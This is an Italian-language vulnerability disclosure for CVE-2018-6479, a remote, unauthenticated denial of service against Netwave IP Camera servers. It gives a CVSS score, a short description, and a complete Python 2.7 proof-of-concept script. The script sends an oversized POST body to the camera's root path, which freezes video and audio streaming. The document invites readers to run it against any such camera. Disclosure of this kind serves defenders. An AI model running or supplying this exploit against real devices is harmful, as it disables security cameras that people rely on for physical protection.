
[CVE-2018-6479] Il server Netwave IP Camera è vulnerabile a Denial of Service tramite un'unica enorme richiesta POST.
| CVE | Descrizione |
|---|---|
| CVE-2018-6479 | Vulnerabilità di negazione del servizio (Denial of Service) remota non autenticata |
| CVSS | Punteggio | Dettagli |
|---|---|---|
| 3 | 7.3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X |
Durante una ricerca sulla sicurezza IoT, sono state scoperte alcune vulnerabilità in diversi produttori di IP camera. Netwave IP Camera è un server per IP camera che consente di visualizzare il video della telecamera e di amministrare la telecamera. Le IP camera sono utilizzate soprattutto per la sicurezza fisica e il controllo, quindi la loro disponibilità è cruciale.
Qualsiasi Netwave IP Camera può essere messa fuori uso semplicemente inviando un'enorme richiesta POST al suo percorso root. Una volta inviata la richiesta, il dispositivo si blocca e smette di trasmettere audio e video.
Proof of Concept: esegui il seguente script Python 2.7 contro qualsiasi NetWave IP Camera: smetterà di rispondere e di trasmettere video/audio all'istante.
import string
import httplib
import urllib2
host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body
headers = {
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}
url = "/"
conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data
Gonzalo García León